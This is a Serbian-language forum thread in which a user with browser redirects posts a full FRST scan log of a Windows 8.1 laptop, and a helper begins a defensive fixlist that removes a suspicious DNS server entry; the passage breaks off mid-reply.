Adware na windowsu 9 sada "ometa konekciju"

• 0Niko još nije pohvalio poruku.
  Registruj se da bi pohvalio/la poruku!

Uloguj se preko Facebooka da bi skinuo fajl:

Pozdrav svima
Prilikom pretraživanja neta i Opera i Ffox i IE i Chrome redirektuju na druge sajtove uglavnom ali express i neki za kladjenje (Bet).Nije mi do sada smetalo iako to traje više meseci.Međutim sada svaku stranu moram da otvorim po minimum 2X.Sporo se učitavaju,download loš, itd.Za konekciju koristim Android 5.1 smartphone kao hotspot povezan na laptop.Kada surfujem direktno preko fona nema problema.Windows defender ne registruje ništa,a malwarebytes anti-malware kao počistio neke trojance_problem ostao.
Zato Vas molim za pomoć.
Hvala unapred.

Izveštaj skeniranja od Farbar Recovery Scan Tool (FRST) (x64) Verzija: 07-12-2016
Pokrenuo mm (administrator) na PC_WIN9 (08-12-2016 17:51:38)
Pokrenuto sa C:\Users\mm\Desktop
Učitani Profili: mm (Dostupani Profili: mm)
Platform: Windows 8.1 (Update) (X64) Jezik: srpski (latinica, Srbija)
Internet Explorer Verzija 11 (Podrazumevani pregledač: Opera)
Režim pokretanja sistema: Normal
Vodič za Farbar Recovery Scan Tool: geekstogo.com/forum/topic/335081-frst-t.....scan-tool/

==================== Procesi (Na Beloj Listi) =================

(Ukoliko je stavka unešena u fixlist, proces ce biti zatvoren. Datoteka nece biti premešten.)

(Qualcomm Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\AdminService.exe
(CrypKey (Canada) Ltd.) C:\Windows\System32\Crypserv.exe
(Samsung Electronics CO., LTD.) C:\Program Files (x86)\Samsung\Settings\CmdServer\EasyLauncher.exe
(Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Microsoft Corporation) C:\Program Files (x86)\Common Files\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe
(arvato digital services llc) C:\Program Files\Common Files\Protexis\License Service\PsiService_2.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Atheros) C:\Program Files (x86)\Bluetooth Suite\Ath_CoexAgent.exe
(Microsoft Corporation) C:\Windows\System32\alg.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
(Microsoft Corporation) C:\Windows\System32\LogonUI.exe
(Microsoft Corporation) C:\Windows\System32\LogonUI.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe
() C:\Program Files (x86)\Samsung\Settings\CmdServer\EasySettingsCmdServer.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Samsung Electronics CO., LTD.) C:\Program Files (x86)\Samsung\Settings\sSettings.exe
(Intel Corporation) C:\Windows\System32\igfxext.exe
(Samsung Electronics CO., LTD.) C:\Program Files (x86)\Samsung\SW Update\SWMAgent.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(MyCity) C:\Program Files (x86)\MCShield\MCShieldRTM.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Samsung Electronics CO., LTD.) C:\Program Files\Samsung\S Agent\CommonAgent.exe
() C:\Program Files\Samsung\Support Center\GuaranaAgent.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
(Microsoft Corporation) C:\Windows\System32\Taskmgr.exe
(Opera Software) C:\Program Files (x86)\Opera\41.0.2353.69\opera.exe
(Opera Software) C:\Program Files (x86)\Opera\41.0.2353.69\opera_crashreporter.exe
(Opera Software) C:\Program Files (x86)\Opera\41.0.2353.69\opera.exe
(Opera Software) C:\Program Files (x86)\Opera\41.0.2353.69\opera.exe
(Opera Software) C:\Program Files (x86)\Opera\41.0.2353.69\opera.exe
(Opera Software) C:\Program Files (x86)\Opera\41.0.2353.69\opera.exe
(Opera Software) C:\Program Files (x86)\Opera\41.0.2353.69\opera.exe
(Opera Software) C:\Program Files (x86)\Opera\41.0.2353.69\opera.exe
(Opera Software) C:\Program Files (x86)\Opera\41.0.2353.69\opera.exe
(Opera Software) C:\Program Files (x86)\Opera\41.0.2353.69\opera.exe
(Opera Software) C:\Program Files (x86)\Opera\41.0.2353.69\opera.exe
(Opera Software) C:\Program Files (x86)\Opera\41.0.2353.69\opera.exe
(Opera Software) C:\Program Files (x86)\Opera\41.0.2353.69\opera.exe
(Opera Software) C:\Program Files (x86)\Opera\41.0.2353.69\opera.exe

==================== Registar (Na Beloj Listi) ====================

(Ukoliko je stavka unešena u fixlist, registru stavka ce biti vraćena na podrazumevanu vrednost ili uklonjena. Datoteka neće biti premeštena.)

HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13191824 2012-08-10] (Realtek Semiconductor)
HKLM-x32\...\Run: [IAStorIcon] => C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe [277504 2012-07-09] (Intel Corporation)
Winlogon\Notify\igfxcui: igfxdev.dll [X]
HKU\S-1-5-21-2752827468-2828176534-1369462658-1001\...\Run: [MCShield Monitor] => C:\Program Files (x86)\MCShield\mcshieldrtm.exe [650816 2014-04-11] (MyCity)
HKU\S-1-5-21-2752827468-2828176534-1369462658-1001\...\Run: [AdobeBridge] => [X]
HKU\S-1-5-21-2752827468-2828176534-1369462658-1001\...\Run: [Google Update] => C:\Users\mm\AppData\Local\Google\Update\GoogleUpdate.exe [144200 2015-08-30] (Google Inc.)
HKU\S-1-5-21-2752827468-2828176534-1369462658-1001\...\MountPoints2: I - "I:\Start07.exe"
HKU\S-1-5-21-2752827468-2828176534-1369462658-1001\...\MountPoints2: {40a283e4-0313-11e3-be8a-50b7c3b4500e} - "G:\Autorun.exe"
HKU\S-1-5-21-2752827468-2828176534-1369462658-1001\...\MountPoints2: {5760188e-2c76-11e3-beaa-50b7c3b4500d} - "G:\Autorun.exe"
HKU\S-1-5-21-2752827468-2828176534-1369462658-1001\...\MountPoints2: {b86b7c4c-0309-11e3-be87-806e6f6e6963} - "G:\Autorun.exe"
HKU\S-1-5-21-2752827468-2828176534-1369462658-1001\...\MountPoints2: {da29b931-fb6b-11e5-bf89-208984108bb0} - "G:\Lenovo_Suite.exe"
HKLM\...\Providers\Internet Print Provider: inetpp.dll
HKLM\...\Providers\LanMan Print Services: win32spl.dll

==================== Internet (Na Beloj Listi) ====================

(Ukoliko je stavka unešena u fixlist, ako je to registru stavka, biće uklonjena ili vraćena na podrazumevanu vrednost.)

Hosts: Postoji više od jednog unosa u Hosts. Pogledati Hosts sekciju iz Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.43.1
Tcpip\Parameters: [NameServer] 8.8.8.8,8.8.8.4
Tcpip\..\Interfaces\{335094DD-08C8-4D04-83ED-54B2A09E695F}: [DhcpNameServer] 82.163.142.3
Tcpip\..\Interfaces\{4CDFB077-1447-49F8-A25E-A98FD35BAD2C}: [NameServer] 82.163.142.3 95.211.158.130
Tcpip\..\Interfaces\{4CDFB077-1447-49F8-A25E-A98FD35BAD2C}: [DhcpNameServer] 192.168.43.1
Tcpip\..\Interfaces\{627F5846-FF3A-472B-97D7-ED63E537C666}: [DhcpNameServer] 82.163.142.3
Tcpip\..\Interfaces\{A130A098-8119-459A-B674-237CE86CB682}: [DhcpNameServer] 82.163.142.3

Internet Explorer:
==================
HKU\S-1-5-21-2752827468-2828176534-1369462658-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.rs/?gws_rd=cr,ssl&ei=s5t0Vc6GF4i3sQHtvKzYBg
URLSearchHook: HKU\S-1-5-21-2752827468-2828176534-1369462658-1001 - (Nema Imena) - {1c95d790-2373-4583-9df1-9b708fa1f778} - Nema Datoteke
SearchScopes: HKLM-x32 -> DefaultScope nedostaje vrednost
SearchScopes: HKU\S-1-5-21-2752827468-2828176534-1369462658-1001 -> DefaultScope {367A1441-34D5-415B-BCFE-6074912A6CFE} URL =
SearchScopes: HKU\S-1-5-21-2752827468-2828176534-1369462658-1001 -> {367A1441-34D5-415B-BCFE-6074912A6CFE} URL =
BHO: CIESpeechBHO Class -> {8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} -> C:\Program Files (x86)\Bluetooth Suite\IEPlugIn.dll [2012-10-31] (Qualcomm Atheros Commnucations)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll [2014-04-14] (Oracle Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll [2014-04-14] (Oracle Corporation)
Handler: WSWSVCUchrome - Nema CLSID Vrednosti

FireFox:
========
FF ProfilePath: C:\Users\mm\AppData\Roaming\Mozilla\Firefox\Profiles\7zshftps.default [2016-12-08]
FF Session Restore: Mozilla\Firefox\Profiles\7zshftps.default -> je omogućen
FF Extension: (Firebug) - C:\Users\mm\AppData\Roaming\Mozilla\Firefox\Profiles\7zshftps.default\Extensions\firebug@software.joehewitt.com.xpi [2016-10-15]
FF Extension: (YouTube ALL HTML5) - C:\Users\mm\AppData\Roaming\Mozilla\Firefox\Profiles\7zshftps.default\Extensions\jid1-qj0w91o64N7Eeg@jetpack.xpi [2016-11-28]
FF Extension: (Easy Youtube Video Downloader Express) - C:\Users\mm\AppData\Roaming\Mozilla\Firefox\Profiles\7zshftps.default\Extensions\{b9acf540-acba-11e1-8ccb-001fd0e08bd4}.xpi [2016-11-28]
FF Extension: (Adblock Plus) - C:\Users\mm\AppData\Roaming\Mozilla\Firefox\Profiles\7zshftps.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2016-11-28]
FF Extension: (User Agent Switcher) - C:\Users\mm\AppData\Roaming\Mozilla\Firefox\Profiles\7zshftps.default\Extensions\{e968fc70-8f95-4ab9-9e79-304de2a71ee1}.xpi [2016-05-17]
FF SearchPlugin: C:\Users\mm\AppData\Roaming\Mozilla\Firefox\Profiles\7zshftps.default\searchplugins\youtube-video-search.xml [2015-08-01]
FF HKLM-x32\...\Thunderbird\Extensions: [eplgTb@eset.com] - C:\Program Files\ESET\ESET Smart Security\Mozilla Thunderbird => nije pronađena
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_23_0_0_207.dll [2016-11-18] ()
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll [2014-05-13] ( Microsoft Corporation)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll [2013-07-27] (Adobe Systems)
FF Plugin: adobe.com/AdobeExManDetect -> C:\Program Files (x86)\Adobe\Adobe Extension Manager CS6\Win64Plugin\npAdobeExManDetectX64.dll [2013-07-14] (Adobe Systems)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_23_0_0_207.dll [2016-11-18] ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2012-06-07] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2012-06-07] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=10.55.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll [2014-04-14] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.55.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll [2014-04-14] (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll [2014-05-13] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3503.0728 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-07-27] (Microsoft Corporation)
FF Plugin-x32: @tracker-software.com/PDF-XChange Editor Plugin,version=1.0,application/pdf -> C:\Program Files\Tracker Software\PDF Editor\npPDFXEditPlugin.x86.dll [Nema Datoteke]
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll [2013-07-27] (Adobe Systems)
FF Plugin-x32: adobe.com/AdobeExManDetect -> C:\Program Files (x86)\Adobe\Adobe Extension Manager CS6\npAdobeExManDetectX86.dll [2013-07-14] (Adobe Systems)
FF Plugin HKU\S-1-5-21-2752827468-2828176534-1369462658-1001: @tools.google.com/Google Update;version=3 -> C:\Users\mm\AppData\Local\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-31] (Google Inc.)
FF Plugin HKU\S-1-5-21-2752827468-2828176534-1369462658-1001: @tools.google.com/Google Update;version=9 -> C:\Users\mm\AppData\Local\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-31] (Google Inc.)

Chrome:
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\mm\AppData\Local\Google\Chrome\User Data\Default [2016-10-16]
CHR Extension: (Google презентације) - C:\Users\mm\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-02-06]
CHR Extension: (Google документи) - C:\Users\mm\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-02-06]
CHR Extension: (Google диск) - C:\Users\mm\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-01-19]
CHR Extension: (YouTube) - C:\Users\mm\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-01-19]
CHR Extension: (Google Search) - C:\Users\mm\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2016-01-19]
CHR Extension: (Google табеле) - C:\Users\mm\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-02-06]
CHR Extension: (Google документи офлајн) - C:\Users\mm\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-01-19]
CHR Extension: (WhatFont) - C:\Users\mm\AppData\Local\Google\Chrome\User Data\Default\Extensions\jabopobgcpjmedljpbcaablpmlmfcogm [2015-08-23]
CHR Extension: (Плаћања у Chrome веб-продавници) - C:\Users\mm\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-01-19]
CHR Extension: (Gmail) - C:\Users\mm\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-05-07]

Opera:
=======
OPR Extension: (Bookmarks) - C:\Users\mm\AppData\Roaming\Opera Software\Opera Stable\Extensions\fnlanmpednndkaaaleibncenahckbmhc [2015-12-02]
OPR Extension: (Web Developer) - C:\Users\mm\AppData\Roaming\Opera Software\Opera Stable\Extensions\kddhmaadmaklcieonhggddempagbakph [2016-07-29]
OPR Extension: (Adblock Plus) - C:\Users\mm\AppData\Roaming\Opera Software\Opera Stable\Extensions\oidhhegpmlfpoeialbgcdocjalghfpkp [2016-10-27]

==================== Servisi (Na Beloj Listi) ====================

(Ukoliko je stavka unešena u fixlist, biće uklonjena iz registra. Datoteka neće biti premeštena ukoliko nije izlistana zasebno..)

R2 AtherosSvc; C:\Program Files (x86)\Bluetooth Suite\adminservice.exe [231040 2012-10-31] (Qualcomm Atheros Commnucations) [Datoteka nije potpisana]
R2 Crypkey License; C:\Windows\SysWOW64\crypserv.exe [122880 2007-03-15] (CrypKey (Canada) Ltd.) [Datoteka nije potpisana]
R2 Easy Launcher; C:\Program Files (x86)\Samsung\Settings\CmdServer\EasyLauncher.exe [1593976 2012-09-05] (Samsung Electronics CO., LTD.)
S3 fussvc; C:\Program Files (x86)\Windows Kits\8.1\App Certification Kit\fussvc.exe [142336 2014-02-19] (Microsoft Corporation) [Datoteka nije potpisana]
R2 IAStorDataMgrSvc; C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [7168 2012-07-09] (Intel Corporation) [Datoteka nije potpisana]
R2 Intel(R) ME Service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe [128896 2012-07-18] (Intel Corporation)
R2 IpOverUsbSvc; C:\Program Files (x86)\Common Files\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbSvc.exe [22744 2014-10-15] (Microsoft Corporation)
S3 iumsvc; C:\Program Files (x86)\Intel\Intel(R) Update Manager\bin\iumsvc.exe [174368 2014-02-28] ()
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [165760 2012-07-18] (Intel Corporation)
R2 PSI_SVC_2_x64; c:\Program Files\Common Files\Protexis\License Service\PsiService_2.exe [337776 2014-04-30] (arvato digital services llc)
S3 rpcapd; C:\Program Files (x86)\WinPcap\rpcapd.exe [118520 2013-03-01] (Riverbed Technology, Inc.)
S3 SwitchBoard; C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated) [Datoteka nije potpisana]
S3 Te.Service; C:\Program Files (x86)\Windows Kits\8.1\Testing\Runtimes\TAEF\Wex.Services.exe [119808 2013-08-22] (Microsoft Corporation) [Datoteka nije potpisana]
S3 VsEtwService120; C:\Program Files\Microsoft Visual Studio 12.0\Common7\Packages\Debugger\Services\VsEtwService.exe [89232 2014-07-22] (Microsoft Corporation)
S3 wampapache; c:\wamp\bin\apache\apache2.4.4\bin\httpd.exe [24576 2013-06-23] (Apache Software Foundation) [Datoteka nije potpisana]
S3 wampmysqld; c:\wamp\bin\mysql\mysql5.6.12\bin\mysqld.exe [12867584 2013-06-23] () [Datoteka nije potpisana]
R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [366552 2015-07-07] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23824 2015-07-07] (Microsoft Corporation)
R2 ZAtheros Bt and Wlan Coex Agent; C:\Program Files (x86)\Bluetooth Suite\Ath_CoexAgent.exe [323584 2012-10-31] (Atheros) [Datoteka nije potpisana]
S3 IDriverT; "C:\Program Files (x86)\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe" [X]
S2 UI Assistant Service; C:\Program Files (x86)\Vip mobilni internet\AssistantServices.exe [X]
S2 WsAppService; C:\Program Files (x86)\Wondershare\WAF\2.1.5.0\WsAppService.exe [X]

===================== Drajveri (Na Beloj Listi) ======================

(Ukoliko je stavka unešena u fixlist, biće uklonjena iz registra. Datoteka neće biti premeštena ukoliko nije izlistana zasebno..)

S3 BTATH_HID; C:\WINDOWS\system32\DRIVERS\btath_hid.sys [222360 2012-10-31] (Qualcomm Atheros)
S3 BTATH_LWFLT; C:\WINDOWS\system32\DRIVERS\btath_lwflt.sys [76952 2012-10-31] (Qualcomm Atheros)
S3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [192216 2016-10-04] (Malwarebytes)
R1 MpKslDrv; C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{38DD5A71-DB03-4286-A336-54CA739EF717}\MpKslDrv.sys [44928 2016-12-07] (Microsoft Corporation)
R1 NetworkX; C:\WINDOWS\system32\ckldrv.sys [27904 2007-05-17] ()
R1 NetworkX; C:\Windows\SysWOW64\ckldrv.sys [31846 2006-01-10] () [Datoteka nije potpisana]
R2 NPF; C:\WINDOWS\System32\drivers\npf.sys [36600 2013-03-01] (Riverbed Technology, Inc.)
R3 RadioHIDMini; C:\WINDOWS\System32\drivers\RadioHIDMini.sys [23408 2012-07-27] (Windows (R) Win 7 DDK provider)
R3 SensorsSimulatorDriver; C:\WINDOWS\system32\DRIVERS\WUDFRd.sys [227840 2014-05-31] (Microsoft Corporation)
S0 WdBoot; C:\WINDOWS\System32\drivers\WdBoot.sys [44560 2015-07-07] (Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\WdFilter.sys [270168 2015-07-07] (Microsoft Corporation)
R2 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [114520 2015-07-07] (Microsoft Corporation)

==================== NetSvcs (Na Beloj Listi) ===================

(Ukoliko je stavka unešena u fixlist, biće uklonjena iz registra. Datoteka neće biti premeštena ukoliko nije izlistana zasebno..)


==================== Mesec Dana Kreirane Datoteke i Fascikli ========

(Ukoliko je stavka unešena u fixlist, Datoteka/Fascikla će biti premeštena.)

2016-12-08 17:51 - 2016-12-08 17:54 - 00018942 _____ C:\Users\mm\Desktop\FRST.txt
2016-12-08 17:51 - 2016-12-08 17:51 - 00000000 ____D C:\FRST
2016-12-08 17:30 - 2016-12-08 17:31 - 02420224 _____ (Farbar) C:\Users\mm\Desktop\FRST64.exe
2016-12-01 00:05 - 2016-12-08 16:18 - 00000000 ____D C:\Users\mm\Desktop\Ytong
2016-11-29 08:54 - 2016-12-08 00:55 - 00000000 ____D C:\Users\mm\AppData\LocalLow\Mozilla
2016-11-28 15:33 - 2016-12-07 21:53 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox

==================== Mesec Dana Modifikovane Datoteke i Fascikli ========

(Ukoliko je stavka unešena u fixlist, Datoteka/Fascikla će biti premeštena.)

2016-12-08 17:31 - 2013-08-22 16:36 - 00000000 ____D C:\WINDOWS\system32\NDF
2016-12-08 17:30 - 2015-12-13 19:40 - 00000000 ____D C:\Users\mm\AppData\Roaming\uTorrent
2016-12-08 17:16 - 2013-08-14 12:53 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2016-12-08 17:13 - 2015-02-03 10:10 - 00000912 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-2752827468-2828176534-1369462658-1001UA.job
2016-12-08 12:31 - 2013-11-14 08:32 - 00006262 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-12-08 12:31 - 2013-08-17 11:35 - 45079414 _____ C:\WINDOWS\system32\perfh01A.dat
2016-12-08 12:31 - 2013-08-17 11:35 - 14896852 _____ C:\WINDOWS\system32\perfc01A.dat
2016-12-08 12:29 - 2015-01-13 13:53 - 00000000 ____D C:\Users\mm\AppData\Local\Adobe
2016-12-08 10:37 - 2013-08-22 14:36 - 00000000 ____D C:\WINDOWS\Inf
2016-12-08 09:12 - 2013-12-25 20:34 - 00000000 ____D C:\ProgramData\MCShield
2016-12-08 08:39 - 2015-08-10 08:03 - 00013098 _____ C:\IFRToolLog.txt
2016-12-08 08:36 - 2012-11-16 10:42 - 00000000 ____D C:\ProgramData\WinClon
2016-12-07 20:08 - 2015-12-29 19:16 - 00000000 ____D C:\Users\mm\Desktop\VOX
2016-11-29 08:54 - 2015-05-02 17:45 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2016-11-28 19:39 - 2016-10-31 14:26 - 00000000 ____D C:\Users\mm\Desktop\Akcija
2016-11-26 23:06 - 2016-05-11 21:18 - 00000892 _____ C:\WINDOWS\Tasks\Adobe Flash Player PPAPI Notifier.job
2016-11-25 20:52 - 2014-05-31 13:20 - 00000000 ___RD C:\Users\mm\NeodgledaniFilmovi
2016-11-25 19:07 - 2013-08-12 05:59 - 00003600 _____ C:\WINDOWS\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-2752827468-2828176534-1369462658-1001
2016-11-25 18:23 - 2016-06-03 19:18 - 00001063 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Opera.lnk
2016-11-25 18:23 - 2014-09-24 17:12 - 00003862 _____ C:\WINDOWS\System32\Tasks\Opera scheduled Autoupdate 1380840746
2016-11-25 18:23 - 2013-10-03 23:52 - 00000000 ____D C:\Program Files (x86)\Opera
2016-11-22 09:58 - 2013-08-22 16:36 - 00000000 ___HD C:\Program Files\WindowsApps
2016-11-22 09:58 - 2013-08-22 16:36 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-11-18 22:17 - 2015-04-08 14:10 - 00000000 ____D C:\Users\mm\Desktop\Web_Inspiracija
2016-11-18 20:18 - 2016-05-11 21:18 - 00003848 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player PPAPI Notifier
2016-11-18 20:18 - 2013-08-22 16:36 - 00000000 ____D C:\WINDOWS\system32\Macromed
2016-11-18 20:18 - 2013-08-14 12:53 - 00003718 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player Updater
2016-11-18 20:17 - 2013-08-22 16:36 - 00000000 ____D C:\WINDOWS\SysWOW64\Macromed
2016-11-18 12:23 - 2015-02-03 10:12 - 00002395 _____ C:\Users\mm\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-11-15 14:22 - 2015-02-24 21:27 - 00000000 ____D C:\SymCache
2016-11-14 01:13 - 2014-01-27 22:38 - 00000498 _____ C:\WINDOWS\system32\Drivers\etc\hosts.ics
2016-11-14 01:13 - 2013-08-22 15:45 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-11-14 01:13 - 2013-08-22 15:44 - 05472264 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2016-11-14 01:11 - 2013-08-22 14:25 - 00524288 ___SH C:\WINDOWS\system32\config\BBI

==================== Datoteke u korenu nekih direktorijuma =======

2013-07-22 03:39 - 2013-07-22 03:39 - 2174976 _____ (Advanced Micro Devices Inc.) C:\Program Files (x86)\Common Files\atimpenc.dll
2015-05-28 10:26 - 2015-07-06 13:09 - 0000521 _____ () C:\Users\mm\AppData\Roaming\.csshat
2015-05-21 23:01 - 2016-05-03 11:48 - 0000132 _____ () C:\Users\mm\AppData\Roaming\Adobe PNG Format CS6 Prefs
2013-08-16 10:40 - 2013-08-16 15:06 - 0803840 ____H () C:\Users\mm\AppData\Roaming\base_en.db
2015-01-23 21:09 - 2016-04-13 13:54 - 0000794 _____ () C:\Users\mm\AppData\Roaming\burnaware.ini
2015-04-14 21:41 - 2016-10-17 14:01 - 0001456 _____ () C:\Users\mm\AppData\Local\Adobe Save for Web 13.0 Prefs
2013-12-05 01:40 - 2015-12-26 00:04 - 0004608 _____ () C:\Users\mm\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2014-05-13 17:59 - 2014-05-13 17:59 - 0000218 _____ () C:\Users\mm\AppData\Local\recently-used.xbel
2013-11-25 23:22 - 2015-04-08 06:58 - 0007626 _____ () C:\Users\mm\AppData\Local\resmon.resmoncfg
2012-11-16 10:53 - 2012-08-08 05:07 - 2258432 _____ (Samsung Electronics) C:\ProgramData\MakeMarkerFile.exe
2012-11-16 10:53 - 2012-08-07 11:11 - 0003196 _____ () C:\ProgramData\MakeMarkerFile.xml

==================== Bamital & volsnap ======================

(Ne postoji automatizovan popravak za datoteke koji nisu prošle verifikaciju.)

C:\WINDOWS\system32\winlogon.exe => Datoteka je digitalno potpisana
C:\WINDOWS\system32\wininit.exe => Datoteka je digitalno potpisana
C:\WINDOWS\explorer.exe => Datoteka je digitalno potpisana
C:\WINDOWS\SysWOW64\explorer.exe => Datoteka je digitalno potpisana
C:\WINDOWS\system32\svchost.exe => Datoteka je digitalno potpisana
C:\WINDOWS\SysWOW64\svchost.exe => Datoteka je digitalno potpisana
C:\WINDOWS\system32\services.exe => Datoteka je digitalno potpisana
C:\WINDOWS\system32\User32.dll => Datoteka je digitalno potpisana
C:\WINDOWS\SysWOW64\User32.dll => Datoteka je digitalno potpisana
C:\WINDOWS\system32\userinit.exe => Datoteka je digitalno potpisana
C:\WINDOWS\SysWOW64\userinit.exe => Datoteka je digitalno potpisana
C:\WINDOWS\system32\rpcss.dll => Datoteka je digitalno potpisana
C:\WINDOWS\system32\dnsapi.dll => Datoteka je digitalno potpisana
C:\WINDOWS\SysWOW64\dnsapi.dll => Datoteka je digitalno potpisana
C:\WINDOWS\system32\Drivers\volsnap.sys => Datoteka je digitalno potpisana


Pažnja!: ==> Nije moguć pristup BCD-u.

LastRegBack: 2016-12-07 11:51

==================== Kraj od FRST.txt ============================



mycity.rs/must-login.png

• 1Ovo se svidja korisniku: eleutheros
  
  Registruj se da bi pohvalio/la poruku!

Pozdrav!

Zamolio bih te da, posle prvog koraka, deinstaliras:
Google Update Helper


1. Otvori Notepad (Text Document) i iskopiraj sledeći tekst unutar kod polja ispod:

CreateRestorePoint:
CloseProcesses:
Tcpip\..\Interfaces\{335094DD-08C8-4D04-83ED-54B2A09E695F}: [DhcpNameServer] 82.163.142.3
